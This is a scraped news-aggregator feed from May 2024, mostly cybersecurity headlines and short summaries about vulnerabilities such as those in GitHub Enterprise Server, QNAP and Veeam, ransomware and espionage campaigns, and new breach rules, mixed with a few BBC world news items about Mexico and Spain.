          As organizations in the healthcare sector continue to be a prime target for ransomware gangs and CISA warns about a vulnerability (CVE-2023-43208) in a healthcare-specific platform being leveraged by attackers, the Advanced Research Projects Agency for Health (ARPA-H) has announced the Universal PatchinG and Remediation for Autonomous DEfense (UPGRADE) program aimed at developing a vulnerability management platform for healthcare IT teams. CVE-2023-43208 exploited by ransomware threat actors CVE-2023-43208, an easily exploitable unauthenticated remote code execution … More

          The post HHS pledges $50M for autonomous vulnerability management solution for hospitals appeared first on Help Net Security.

          "

          Autosummary: The goal of the UPGRADE program is to create a security platform that will adapt to any hospital environment, proactively and autonomously simulate/evaluate the risk and potential impact of vulnerabilities, procure or develop a patch, test it in a model environment, and deploy it in a way that’s minimally disruptive to medical, IT, and other devices in use at healthcare delivery organizations. "


          10 years in prison for $4.5 million BEC scammer who bought Ferrari to launder money

          financial
          2024-05-23 https://www.tripwire.com/state-of-security/10-years-prison-45-million-bec-scammer-who-bought-ferrari-launder-money
          A scammer has been sentenced to 10 years in prison for laundering over US $4.5 million obtained by targeting businesses and the elderly with Business Email Compromise (BEC) and romance fraud schemes. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: Malachi Mullings, a 31-year-old from Sandy Springs, Georgia, was charged with opening 20 bank accounts in the name of a sham company, The Mullings Group LLC, to launder millions of dollars generated through fraudulent activity between 2019 and July 2021. "


          GitHub fixes maximum severity Enterprise Server auth bypass bug (CVE-2024-4985)

          exploits
          2024-05-23 https://www.helpnetsecurity.com/2024/05/23/cve-2024-4985/

          A critical, 10-out-of-10 vulnerability (CVE-2024-4985) allowing unrestricted access to vulnerable GitHub Enterprise Server (GHES) instances has been fixed by Microsoft-owned GitHub. Fortunately, there is a catch that may narrow down the pool of potential victims: instances are vulnerable to attack only if they use SAML single sign-on (SSO) authentication AND have the (optional) encrypted assertions feature enabled. About CVE-2024-4985 GitHub Enterprise Server is a software development platform that organizations host either on-premises or on a … More

          The post GitHub fixes maximum severity Enterprise Server auth bypass bug (CVE-2024-4985) appeared first on Help Net Security.

          "

          Autosummary: "


          Inside Operation Diplomatic Specter: Chinese APT Group's Stealthy Tactics Exposed

          industry
          2024-05-23 https://thehackernews.com/2024/05/inside-operation-diplomatic-specter.html
          Governmental entities in the Middle East, Africa, and Asia are the target of a Chinese advanced persistent threat (APT) group as part of an ongoing cyber espionage campaign dubbed Operation Diplomatic Specter since at least late 2022. "An analysis of this threat actor’s activity reveals long-term espionage operations against at least seven governmental entities," Palo Alto Networks "

          Autosummary: The Chinese links to Operation Diplomatic Specter further stem from the use of operational infrastructure exclusively used by China-nexus groups like APT27, Mustang Panda, and Winnti, not to mention tools like the China Chopper web shell and PlugX. "The exfiltration techniques observed as part of Operation Diplomatic Specter provide a distinct window into the possible strategic objectives of the threat actor behind the attacks," the researchers concluded. "


          Ransomware Attacks Exploit VMware ESXi Vulnerabilities in Alarming Pattern

          exploits
          2024-05-23 https://thehackernews.com/2024/05/ransomware-attacks-exploit-vmware-esxi.html
          Ransomware attacks targeting VMware ESXi infrastructure follow an established pattern regardless of the file-encrypting malware deployed. "Virtualization platforms are a core component of organizational IT infrastructure, yet they often suffer from inherent misconfigurations and vulnerabilities, making them a lucrative and highly effective target for threat actors to abuse," "

          Autosummary: This includes the following steps:
          - Obtaining initial access through phishing attacks, malicious file downloads, and exploitation of known vulnerabilities in internet-facing assets
          - Escalating their privileges to obtain credentials for ESXi hosts or vCenter using brute-force attacks or other methods
          - Validating their access to the virtualization infrastructure and deploying the ransomware
          - Deleting or encrypting backup systems, or in some cases, changing the passwords, to complicate recovery efforts
          - Exfiltrating data to external locations such as Mega.io, Dropbox, or their own hosting services
          - Initiating the execution of the ransomware to encrypt the "/vmfs/volumes" folder of the ESXi filesystem
          - Propagating the ransomware to non-virtualized servers and workstations to widen the scope of the attack
          To mitigate the risks posed by such threats, it's recommended for organizations to ensure adequate monitoring and logging are in place, create robust backup mechanisms, enforce strong authentication measures, harden the environment, and implement network restrictions to prevent lateral movement. "


          CISA Warns of Actively Exploited Apache Flink Security Vulnerability

          exploits
          2024-05-23 https://thehackernews.com/2024/05/cisa-warns-of-actively-exploited-apache.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw impacting Apache Flink, the open-source, unified stream-processing and batch-processing framework, to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2020-17519, the issue relates to a case of improper access control that "

          Autosummary: "


          New Frontiers, Old Tactics: Chinese Espionage Group Targets Africa & Caribbean Govts

          industry
          2024-05-23 https://thehackernews.com/2024/05/new-frontiers-old-tactics-chinese-cyber.html
          The China-linked threat actor known as Sharp Panda has expanded their targeting to include governmental organizations in Africa and the Caribbean as part of an ongoing cyber espionage campaign. "The campaign adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like C2 communication and command execution while minimizing the exposure of their custom tools," Check Point "

          Autosummary: The sustained strategic intrusions by Chinese threat actors in Africa against key industrial sectors, such as telecom service providers, financial institutions, and governmental bodies, align with the nation's technological agenda in the region, tying into its Digital Silk Road (DSR) project announced in 2015. "


          Microsoft spots gift card thieves using cyber-espionage tactics

          industry
          2024-05-23 https://www.bleepingcomputer.com/news/security/microsoft-spots-gift-card-thieves-using-cyber-espionage-tactics/
          Microsoft has published a "Cyber Signals" report sharing new information about the hacking group Storm-0539 and a sharp rise in gift card theft as we approach the Memorial Day holiday in the United States. [...]

          Autosummary: SMS phishing sent to targets (Source: Microsoft). Once they gain access to the target environment using stolen accounts, they register their own devices with the company's multi-factor authentication (MFA) platforms for persistence and then move laterally by compromising virtual machines, VPNs, SharePoint, OneDrive, Salesforce, and Citrix environments.


          UK Government ponders major changes to ransomware response – what you need to know

          exploits government ransomware
          2024-05-23 https://www.exponential-e.com/blog/uk-government-ponders-major-changes-to-ransomware-response-what-you-need-to-know
          The British Government is proposing sweeping changes in its approach to ransomware attacks, proposing mandatory reporting by victims and a licensing regime for all payments. Read more in my article on the Exponential-e blog.



          Drone video shows aftermath of Mexico stage collapse

          latam
          2024-05-23 https://www.bbc.com/news/videos/c888vl1pv95o
          At least nine people died after strong wind gusts brought part of a stage to the ground at a campaign event.



          Child among at least nine dead at Mexico election rally

          latam
          2024-05-23 https://www.bbc.com/news/articles/crggzp9m7ydo
          Part of the stage toppled over in high winds at an event for presidential candidate Jorge Alvarez Maynez.



          Cybersecurity jobs available right now: May 22, 2024

          ciber
          2024-05-22 https://www.helpnetsecurity.com/2024/05/22/cybersecurity-jobs-available-right-now-may-22-2024/

          Associate Director, Cyber Security AstraZeneca | Sweden | On-site – View job details You will develop and implement security policies, procedures, and operating practices in this role. You will coordinate risk profile development and distribution to IT business-facing audiences and maintain compliance with all AstraZeneca Security Policy Framework requirements. You will support cyber risk assessments and make recommendations to IT leadership. Automotive Cyber Security Expert IDSafe | India | Hybrid – View job details In … More

          The post Cybersecurity jobs available right now: May 22, 2024 appeared first on Help Net Security.


          Autosummary: Cyber Security Consultant RINA | Italy | Hybrid – View job details As an IT Cyber Security Consultant, you will conduct penetration tests, engage in red teaming and OSINT, perform vulnerability assessments, craft reports, advise on security enhancements, present vulnerabilities to clients, analyze security configurations, develop hardening guidelines, support remediation strategies, and more. Biomedical Cybersecurity Specialist Queensland Health | Australia | Hybrid – View job details In this role, you’ll lead biomedical ICT and cybersecurity initiatives, provide training, design solutions, conduct risk assessments, manage security incidents, and ensure compliance. Senior Associate Cloud Data Engineer – Cybersecurity PwC | Argentina | On-site – View job details You will be part of a growing team driving strategic programs, data analytics, innovation, deals, cyber resiliency, response, and technical implementation activities.


          GHOSTENGINE Exploits Vulnerable Drivers to Disable EDRs in Cryptojacking Attack

          exploits
          2024-05-22 https://thehackernews.com/2024/05/ghostengine-exploits-vulnerable-drivers.html
          Cybersecurity researchers have discovered a new cryptojacking campaign that employs vulnerable drivers to disable known security solutions (EDRs) and thwart detection in what's called a Bring Your Own Vulnerable Driver (BYOVD) attack. Elastic Security Labs is tracking the campaign under the name REF4578 and the primary payload as GHOSTENGINE. Previous research from Chinese

          Autosummary: Another novel method is HookChain, which, as Brazilian security researcher Helvio Carvalho Junior has described, involves combining IAT hooking, dynamic system service number (SSN) resolution, and indirect system calls to escape monitoring and control mechanisms implemented by security software in user mode, particularly in the NTDLL.dll library. A majority of the impacted servers are located in China, followed by Hong Kong, the Netherlands, Japan, the U.S., Germany, South Africa, and Sweden.


          MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks

          exploits
          2024-05-22 https://thehackernews.com/2024/05/ms-exchange-server-flaws-exploited-to.html
          An unknown threat actor is exploiting known security flaws in Microsoft Exchange Server to deploy a keylogger malware in attacks targeting entities in Africa and the Middle East. Russian cybersecurity firm Positive Technologies said it identified over 30 victims spanning government agencies, banks, IT companies, and educational institutions. The first-ever compromise dates back to 2021. "This



          OmniVision disclosed a data breach after the 2023 Cactus ransomware attack

          financial exploits ransomware
          2024-05-22 https://securityaffairs.com/163506/data-breach/omnivision-data-breach.html
          The digital imaging products manufacturer OmniVision disclosed a data breach after the 2023 ransomware attack. OmniVision Technologies is a company that specializes in developing advanced digital imaging solutions. In 2023, OmniVision employed 2,200 people and had an annual revenue of $1.4 billion. OmniVision Technologies Inc. is an American subsidiary of Chinese semiconductor device and mixed-signal integrated […]

          Autosummary: The company designs and develops digital imaging products for use in mobile phones, laptops, netbooks and webcams, security and surveillance cameras, entertainment, automotive and medical imaging systems. As proof of the data breach, the extortion group published data samples, including passport images, NDAs, contracts, and other documents.


          Rockwell Advises Disconnecting Internet-Facing ICS Devices Amid Cyber Threats

          industry
          2024-05-22 https://thehackernews.com/2024/05/rockwell-advises-disconnecting-internet.html
          Rockwell Automation is urging its customers to disconnect all industrial control systems (ICSs) not meant to be connected to the public-facing internet to mitigate unauthorized or malicious cyber activity. The company said it's issuing the advisory due to "heightened geopolitical tensions and adversarial cyber activity globally." To that end, customers are required to take immediate

          Autosummary: "Cyber actors, including advanced persistent threat (APT) groups, have targeted OT/ICS systems in recent years to achieve political gains, economic advantages, and possibly to execute destructive effects," the NSA noted in September 2022.


          Critical GitHub Enterprise Server Authentication Bypass bug. Fix it now!

          exploits
          2024-05-22 https://securityaffairs.com/163515/hacking/github-enterprise-server-cve-2024-4985.html
          GitHub addressed a vulnerability in the GitHub Enterprise Server (GHES) that could allow an attacker to bypass authentication. GitHub has rolled out security fixes to address a critical authentication bypass issue, tracked as CVE-2024-4985 (CVSS score: 10.0), in the GitHub Enterprise Server (GHES). GitHub Enterprise Server (GHES) is a self-hosted version of GitHub designed for use […]

          Autosummary: It provides the full capabilities of GitHub, including source code management, version control, collaboration tools, and continuous integration and delivery (CI/CD), but allows organizations to host the platform on their own infrastructure.


          State hackers turn to massive ORB proxy networks to evade detection

          government
          2024-05-22 https://www.bleepingcomputer.com/news/security/state-hackers-turn-to-massive-orb-proxy-networks-to-evade-detection/
          Security researchers are warning that China-linked state-backed hackers are increasingly relying on vast proxy networks of virtual private servers and compromised connected devices for cyberespionage operations. [...]

          Autosummary: Regardless of the type of devices used, an ORB network has a set of essential components that allow it to work properly:
          - Adversary Controlled Operations Server (ACOS): server for administering nodes in an ORB network
          - Relay node: lets users authenticate to the network and relay traffic through the larger traversal pool of ORB nodes
          - Traversal nodes: the main nodes composing an ORB network; they obfuscate the origin of the traffic
          - Exit/Staging nodes: used to launch attacks on targets
          - Victim server: victim infrastructure communicating with the node on the ORB network
          Enterprise defense challenges: The use of ORBs has been observed in the past, the most prominent recent example being the Volt Typhoon attacks on US critical infrastructure organizations using SOHO network equipment (e.g. routers, firewalls, and VPN appliances).


          Cybercriminals are targeting elections in India with influence campaigns

          ciber
          2024-05-22 https://securityaffairs.com/163529/cyber-crime/hacktivists-target-elections-india.html
          Resecurity warns of a surge in malicious cyber activity targeting the election in India, orchestrated by several independent hacktivist groups. Resecurity has identified a spike of malicious cyber activity targeting the election in India, which is supported by multiple independent hacktivist groups who arrange cyber-attacks and the publication of stolen personally identifiable information (PII) belonging to […]

          Autosummary: Pierluigi Paganini, May 22, 2024. Resecurity has identified a spike of malicious cyber activity targeting the election in India, supported by multiple independent hacktivist groups who arrange cyber-attacks and the publication of stolen personally identifiable information (PII) belonging to Indian citizens on the Dark Web. India, with a population of over 1.4 billion and a GDP of over 3.417 trillion USD, has become a prime target for cyberattacks during its general elections scheduled between 19 April and 1 June 2024.


          An ongoing malware campaign exploits Microsoft Exchange Server flaws

          exploits
          2024-05-22 https://securityaffairs.com/163521/breaking-news/microsoft-exchange-server-flaws-attacks.html
          A threat actor is targeting organizations in Africa and the Middle East by exploiting Microsoft Exchange Server flaws to deliver malware. Positive Technologies researchers, while responding to a customer’s incident, spotted an unknown keylogger embedded in the main Microsoft Exchange Server page. The keylogger was used to collect account credentials. Further investigation allowed them to identify over […]

          Autosummary: Some of the countries targeted by this campaign are Russia, the U.A.E., Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon.


          Critical Veeam Backup Enterprise Manager authentication bypass bug

          exploits
          2024-05-22 https://securityaffairs.com/163534/security/veeam-backup-enterprise-manager-cve-2024-29849.html
          A critical security vulnerability in Veeam Backup Enterprise Manager could allow threat actors to bypass authentication. A critical vulnerability, tracked as CVE-2024-29849 (CVSS score: 9.8), in Veeam Backup Enterprise Manager could allow attackers to bypass authentication. Veeam Backup Enterprise Manager is a centralized management and reporting tool designed to simplify the administration of Veeam Backup & Replication […]

          Autosummary: To do this, stop and disable the following services: VeeamEnterpriseManagerSvc (Veeam Backup Enterprise Manager) and VeeamRESTSvc (Veeam RESTful API Service). Note: Do not stop the ‘Veeam Backup Server RESTful API Service’.


          The Mexican state where candidates are gunned down as they push for votes

          government
          2024-05-22 https://www.bbc.com/news/articles/c299p249nx5o
          Politicians are shocked by an even more violent campaign than usual, particularly in Guerrero state.

          Autosummary: Will Grant, Mexico and Central America correspondent in Guerrero. Cinthia Juarez is running for office in Acapulco after her friend, a famous gay rights activist, was murdered on the campaign trail. In what is the most violent election campaign in Mexico’s history, the western state of Guerrero is the most dangerous place in the country to look for votes. He also denies the President’s security strategy – often summarised by his quote “abrazos, no balazos”, meaning “hugs, not bullets” – has failed: “That quote must be put into context”, he argues. But the small, fiercely determined woman, who is also a leading gay rights defender in her community, says she refuses to give in to fear.


          PSNI could be fined £750k over data breach

          financial
          2024-05-22 https://www.bbc.com/news/articles/czqqjglq1lyo
          The Police Service of Northern Ireland (PSNI) could be fined £750,000 for a major data breach last year.

          Autosummary: “I am publicising this potential action today to, once again, highlight the need for all organisations to check, challenge and, where necessary, change disclosure procedures to ensure they have robust measures in place to protect the personal information people entrust to them.”


          "People are just not worried about being scammed"

          financial
          2024-05-22 https://www.bbc.com/news/articles/c988v355e8do
          Fraudsters are increasingly using AI, but are people taking the problem seriously enough?

          Autosummary: In fact, there is a product sold on the dark web called FraudGPT, which allows criminals to make content to facilitate a range of frauds, including creating bank-related phishing emails, or to custom-make scam web pages designed to steal personal information. As part of his efforts, Mr Hoefnagels, who lives in Ontario, Canada, ran the scam or “phishing” emails his gran had received through popular AI chatbot ChatGPT. Jane Wakefield, Technology reporter. Clark Hoefnagels created an AI-powered tool that spots scam emails. When Clark Hoefnagels’ grandmother was scammed out of $27,000 (£21,000) last year, he felt compelled to do something about it.


          Electricity grids creak as AI demands soar

          government
          2024-05-21 https://www.bbc.com/news/articles/cj5ll89dy2mo
          Data centre electricity demand is forecast to double in four years, putting energy grids under pressure.



          Phishing statistics that will make you think twice before clicking

          financial industry
          2024-05-21 https://www.helpnetsecurity.com/2024/05/21/phishing-statistics-2024/

          This article includes excerpts from various reports that offer statistics and insights into the current phishing landscape. AI-driven phishing attacks deceive even the most aware users Zscaler | Zscaler ThreatLabz 2024 Phishing Report | May 2024 In 2023, the United States (55.9%), United Kingdom (5.6%) and India (3.9%) emerged as the top countries targeted by phishing scams. The finance and insurance sector experienced the highest number of overall phishing attempts, amounting to a 393% increase … More

          The post Phishing statistics that will make you think twice before clicking appeared first on Help Net Security.


          Autosummary: Proofpoint | 2024 State of the Phish | February 2024 And while the incidence of successful phishing attacks has slightly declined (71% of surveyed organizations experienced at least one successful attack in 2023 versus 84% the previous year), the negative consequences have soared: a 144% increase in reports of financial penalties, such as regulatory fines, and a 50% increase in reports of reputational damage.


          "Linguistic Lumberjack" Vulnerability Discovered in Popular Logging Utility Fluent Bit

          exploits
          2024-05-21 https://thehackernews.com/2024/05/linguistic-lumberjack-vulnerability.html
          Cybersecurity researchers have discovered a critical security flaw in a popular logging and metrics utility called Fluent Bit that could be exploited to achieve denial-of-service (DoS), information disclosure, or remote code execution. The vulnerability, tracked as CVE-2024-4323, has been codenamed Linguistic Lumberjack by Tenable Research. It impacts versions from 2.0.7 through



          Experts released PoC exploit code for RCE in QNAP QTS

          exploits
          2024-05-21 https://securityaffairs.com/163470/hacking/fifteen-vulnerabilities-in-the-qnap-qts.html
          Experts warn of fifteen vulnerabilities in the QNAP QTS, the operating system for the Taiwanese vendor’s NAS products. An audit of QNAP QTS conducted by WatchTowr Labs revealed fifteen vulnerabilities, most of which have yet to be addressed. The most severe vulnerability is a flaw tracked as CVE-2024-27130. The issue is an unpatched stack buffer […]

          Autosummary: Accepted by vendor; no fix available (first reported December 12th 2023). Requires valid account on NAS device.
          - CVE-2024-27127: A double-free in utilRequest.cgi via the delete_share function. Accepted by vendor; no fix available (first reported January 3rd 2024). Requires valid account on NAS device.
          - CVE-2024-27128: Stack overflow in check_email function, reachable via the share_file and send_share_mail actions of utilRequest.cgi (possibly others), leads to RCE. Accepted by vendor; no fix available (first reported January 3rd 2024). Requires valid account on NAS device.
          - CVE-2024-27129: Unsafe use of strcpy in get_tree function of utilRequest.cgi leads to static buffer overflow and thus RCE. Accepted by vendor; no fix available (first reported January 3rd 2024). Requires valid account on NAS device.
          - CVE-2024-27130: Unsafe use of strcpy in No_Support_ACL, accessible by get_file_size function of share.cgi, leads to stack buffer overflow and thus RCE. Accepted by vendor; no fix available (first reported January 3rd 2024). Requires a valid NAS user to share a file.
          - CVE-2024-27131: Log spoofing via x-forwarded-for allows users to cause downloads to be recorded as requested from arbitrary source location. Accepted by vendor; no fix available (first reported January 3rd 2024). Requires ability to download a file.
          - WT-2023-0050: N/A. Under extended embargo due to unexpectedly complex issue. N/A.
          - WT-2024-0004: Stored XSS via remote syslog messages. No fix available (first reported January 8th 2024). Requires non-default configuration.
          - WT-2024-0005: Stored XSS via remote device discovery


          SolarMarker Malware Evolves to Resist Takedown Attempts with Multi-Tiered Infrastructure

          exploits
          2024-05-21 https://thehackernews.com/2024/05/solarmarker-malware-evolves-to-resist.html
          The persistent threat actors behind the SolarMarker information-stealing malware have established a multi-tiered infrastructure to complicate law enforcement takedown efforts, new findings from Recorded Future show. "The core of SolarMarker's operations is its layered infrastructure, which consists of at least two clusters: a primary one for active operations and a secondary one likely

          Autosummary: "The Tier 4 server is considered the central server of the operation, presumably used for effectively administering all downstream servers on a long-term basis," the cybersecurity firm said, adding it also observed the Tier 4 C2 server communicating with another "auxiliary server" via port 8033.


          Spain recalls Argentina ambassador in Milei insult row

          latam
          2024-05-21 https://www.bbc.com/news/articles/c988v2xl7zwo
          Spain "definitively" recalls its ambassador to Argentina, in an escalating row with President Javier Milei.



          15 QNAP NAS bugs and one PoC disclosed, update ASAP! (CVE-2024-27130)

          exploits
          2024-05-21 https://www.helpnetsecurity.com/2024/05/21/cve-2024-27130-poc/

          Researchers have found 15 vulnerabilities in QNAP’s network attached storage (NAS) devices, and have released a proof-of-concept for one: an unauthenticated stack overflow vulnerability (CVE-2024-27130) that may be leveraged for remote code execution. The vulnerabilities and the CVE-2024-27130 PoC “With a codebase bearing some long 10+ year legacy, and a long history of security weaknesses,” QNAP’s QTS operating system and its “variants” (QuTSCloud and QTS hero) enticed WatchTowr Labs researchers to probe for vulnerabilities. “Given … More

          The post 15 QNAP NAS bugs and one PoC disclosed, update ASAP! (CVE-2024-27130) appeared first on Help Net Security.


          Autosummary: “We can, of course, verify this expectation by turning to a quick-and-dirty google dork, which finds a whole bunch of ssids, verifying our assumption that sharing a file with the entire world is something that is done frequently by NAS users.”


          Malware Delivery via Cloud Services Exploits Unicode Trick to Deceive Users

          exploits
          2024-05-21 https://thehackernews.com/2024/05/malware-delivery-via-cloud-services.html
          A new attack campaign dubbed CLOUD#REVERSER has been observed leveraging legitimate cloud storage services like Google Drive and Dropbox to stage malicious payloads. "The VBScript and PowerShell scripts in the CLOUD#REVERSER inherently involves command-and-control-like activities by using Google Drive and Dropbox as staging platforms to manage file uploads and downloads," Securonix

          Autosummary: Each of these scripts, in turn, is employed to run two different PowerShell scripts, "Tmp912.tmp" and "Tmp703.tmp," which are used to connect to an actor-controlled Dropbox and Google Drive account and download two more PowerShell scripts referred to as "tmpdbx.ps1" and "zz.ps1". The VB scripts are then configured to run the newly downloaded PowerShell scripts and fetch more files from the cloud services, including binaries that could be executed depending on the system policies.


          Blackbasta group claims to have hacked Atlas, one of the largest US oil distributors

          industry
          2024-05-21 https://securityaffairs.com/163489/cyber-crime/blackbasta-claims-atlas-hack.html
          The Blackbasta extortion group claims to have hacked Atlas, one of the largest national distributors of fuel in the United States. Atlas is one of the largest national fuel distributors to 49 continental US States with over 1 billion gallons per year. The Blackbasta extortion group added the company to the list of victims on […]

          Autosummary: Pierluigi Paganini, May 21, 2024. The Blackbasta extortion group claims to have hacked Atlas, one of the largest national distributors of fuel in the United States.


          LockBit says they stole data in London Drugs ransomware attack

          exploits ransomware
          2024-05-21 https://www.bleepingcomputer.com/news/security/lockbit-says-they-stole-data-in-london-drugs-ransomware-attack/
          Today, the LockBit ransomware gang claimed they were behind the April cyberattack on Canadian pharmacy chain London Drugs and is now threatening to publish stolen data online after allegedly failed negotiations. [...]

          Autosummary: London Drugs added that they will not and cannot pay the ransom requested by LockBit, but acknowledged that the gang "may leak stolen London Drugs corporate files, some of which may contain employee information on the Dark Web." "At this stage in our investigation, we are not able to provide specifics on the nature or extent of employee personal information potentially impacted."


          Western Sydney University data breach exposed student data

          financial
          2024-05-21 https://www.bleepingcomputer.com/news/security/western-sydney-university-data-breach-exposed-student-data/
          Western Sydney University (WSU) has notified students and academic staff about a data breach after threat actors breached its Microsoft 365 and Sharepoint environment. [...]

          Autosummary: This intrusion was only discovered much later, in January 2024, with the University's IT team shutting down the unauthorized access and launching an internal investigation into the incident, also involving specialists from the NSW Police, CrowdStrike, and CyberCX.


          Rockwell Automation warns admins to take ICS devices offline

          industry
          2024-05-21 https://www.bleepingcomputer.com/news/security/rockwell-automation-warns-admins-to-take-ics-devices-offline/
          Rockwell Automation warned customers to disconnect all industrial control systems (ICSs) not designed for online exposure from the Internet due to increasing malicious activity worldwide. [...]



          CISA adds NextGen Healthcare Mirth Connect flaw to its Known Exploited Vulnerabilities catalog

          exploits
          2024-05-21 https://securityaffairs.com/163496/security/cisa-adds-nextgen-healthcare-mirth-connect-flaw-known-exploited-vulnerabilities-catalog.html
          CISA adds NextGen Healthcare Mirth Connect deserialization of untrusted data vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a NextGen Healthcare Mirth Connect vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The issue, tracked as CVE-2023-43208, is a Deserialization of Untrusted Data Vulnerability. Deserialization of untrusted data vulnerability […]

          Autosummary: According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.


          Veeam warns of critical Backup Enterprise Manager auth bypass bug

          exploits
          2024-05-21 https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-backup-enterprise-manager-auth-bypass-bug/
          Veeam warned customers today to patch a critical security vulnerability that allows unauthenticated attackers to sign into any account via the Veeam Backup Enterprise Manager (VBEM). [...]



          Cybercriminals shift tactics to pressure more victims into paying ransoms

          industry ciber
          2024-05-20 https://www.helpnetsecurity.com/2024/05/20/ransomware-claims-frequency-grow/

          Ransomware didn’t just grow in the US in 2023, it evolved, with the frequency of ransomware claims jumping 64% year-over-year, according to At-Bay. This was primarily driven by an explosion in “indirect” ransomware incidents, which increased by more than 415% in 2023 compared with 2022. Standing out among the biggest loss drivers were remote access tools, which accounted for 58% of ransomware attacks. Double leverage attacks – those using both data encryption and exfiltration – … More

          The post Cybercriminals shift tactics to pressure more victims into paying ransoms appeared first on Help Net Security.




          Consumers continue to overestimate their ability to spot deepfakes

          ransomware
          2024-05-20 https://www.helpnetsecurity.com/2024/05/20/consumers-online-identity-fraud/

          The Jumio 2024 Online Identity Study reveals significant consumer concerns about the risks posed by generative AI and deepfakes, including the potential for increased cybercrime and identity fraud. The study examined the views of more than 8,000 adult consumers, split evenly across the United Kingdom, United States, Singapore and Mexico. The results suggest nearly 72% worry on a day-to-day basis about being fooled by a deepfake into handing over sensitive information or money. Only 15% … More

          The post Consumers continue to overestimate their ability to spot deepfakes appeared first on Help Net Security.


          Autosummary: More than 80% of Singapore consumers said they’d be willing to spend more time on identity verification if those measures improve security in industries including financial services (85%), the sharing economy (85%), healthcare (85%), government (84%), travel and hospitality (84%), retail and ecommerce (83%), social media (82%) and telecoms (82%).


          Understanding cyber risks beyond data breaches

          financial
          2024-05-20 https://www.helpnetsecurity.com/2024/05/20/cyber-risk-trends-video/

          While some may associate cyber risks primarily with technology and data breaches, they can also lead to brand or reputational harm, reduced productivity, and financial losses. This Help Net Security round-up presents excerpts from previously recorded videos featuring security experts covering a spectrum of cyber risk trends, ranging from threats to large language models and supply chains to social engineering tactics and the proliferation of celebrity audio deepfakes. Complete videos Melissa Bischoping, Director, Endpoint Security … More

          The post Understanding cyber risks beyond data breaches appeared first on Help Net Security.




          Latrodectus Malware Loader Emerges as IcedID's Successor in Phishing Campaigns

          financial exploits
          2024-05-20 https://thehackernews.com/2024/05/latrodectus-malware-loader-emerges-as.html
          Cybersecurity researchers have observed a spike in email phishing campaigns starting in early March 2024 that deliver Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. "These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI's ability to invoke msiexec.exe and install a remotely-hosted MSI

          Autosummary: Latrodectus also sets up persistence on Windows hosts using a scheduled task and establishes contact with a command-and-control (C2) server over HTTPS to receive commands that allow it to collect system information; update, restart, and terminate itself; and run shellcode, DLL, and executable files.


          Grandoreiro Banking Trojan is back and targets banks worldwide

          financial exploits
          2024-05-20 https://securityaffairs.com/163420/malware/grandoreiro-return-after-takedown.html
          A new Grandoreiro banking trojan campaign has been ongoing since March 2024, following the disruption by law enforcement in January. IBM X-Force warns of a new Grandoreiro banking trojan campaign that has been ongoing since March 2024. Operators behind the Grandoreiro banking trojan have resumed operations following a law enforcement takedown in January. The recent campaign is […]

          Autosummary: Traditionally limited to Latin America, Spain, and Portugal, recent Grandoreiro campaigns have expanded their targets to include entities such as Mexico’s Tax Administration Service (SAT), Federal Electricity Commission (CFE), Secretary of Administration and Finance, the Revenue Service of Argentina, and the South African Revenue Service (SARS). "


          Financial institutions ordered to notify customers after a breach, have an incident response plan

          financial
          2024-05-20 https://www.malwarebytes.com/blog/news/2024/05/financial-institutions-ordered-to-notify-customers-after-a-breach-have-an-incident-response-plan
          The Securities and Exchange Commission has announced rules around breaches for certain financial institutions.

          Autosummary: The Securities and Exchange Commission (SEC) has announced rules around breaches for certain financial institutions—registered broker-dealers, investment companies, investment advisers, and transfer agents—that require them to have written incident response policies and procedures that can be used in the event of a breach.


          Strata Identity Maverics Identity Continuity provides real-time IDP failover capabilities

          ransomware industry
          2024-05-20 https://www.helpnetsecurity.com/2024/05/20/strata-identity-maverics-identity-continuity/

          Strata Identity announced Maverics Identity Continuity, a new add-on product to its Maverics Identity Orchestration platform that provides always-on identity continuity in multi-cloud environments. Unlike regional redundancy offerings from cloud providers and existing backup and restore products that only shorten the time it takes to rebuild IDP (primary identity provider) infrastructures after an outage, Strata’s Identity Continuity product maintains uninterrupted identity services by autonomously and transparently failing over to an alternate IDP. With many organizations … More


          Autosummary: The need for always-on identity: Traditional identity resilience offerings are limited to providing disaster recovery using point-in-time IDP policy configuration backups, but cannot prevent a business’ mission-critical applications from going offline.


          PoC exploit for Ivanti EPMM privilege escalation flaw released (CVE-2024-22026)

          exploits
          2024-05-20 https://www.helpnetsecurity.com/2024/05/20/cve-2024-22026-poc/

          Technical details about and a proof-of-concept (PoC) exploit for CVE-2024-22026, a privilege escalation bug affecting Ivanti EPMM, have been released by the vulnerability’s reporter. About CVE-2024-22026: Ivanti Endpoint Manager Mobile (formerly MobileIron Core) is used by enterprises to securely manage the lifecycle of mobile devices and mobile applications. CVE-2024-22026 was discovered by Bryan Smith, a security researcher with Redline Cyber Security, and affects Ivanti EPMM v12.0 and earlier. “CVE-2024-22026 stems from inadequate validation in the … More


          Autosummary: CVE-2024-22026, along with two SQL injection flaws (CVE-2023-46806, CVE-2023-46807), has been fixed in Ivanti EPMM v12.1.0.0.


          SEC requires financial institutions to notify customers of breaches within 30 days

          financial
          2024-05-20 https://www.helpnetsecurity.com/2024/05/20/sec-financial-institutions-rules/

          The Securities and Exchange Commission (SEC) announced the adoption of amendments to Regulation S-P to modernize and enhance the rules that govern the treatment of consumers’ nonpublic personal information by certain financial institutions. The amendments update the rules’ requirements for broker-dealers (including funding portals), investment companies, registered investment advisers, and transfer agents (collectively, “covered institutions”) to address the expanded use of technology and corresponding risks that have emerged since the Commission originally adopted Regulation S-P … More



          Foxit PDF Reader Flaw Exploited by Hackers to Deliver Diverse Malware Arsenal

          exploits
          2024-05-20 https://thehackernews.com/2024/05/foxit-pdf-reader-flaw-exploited-by.html
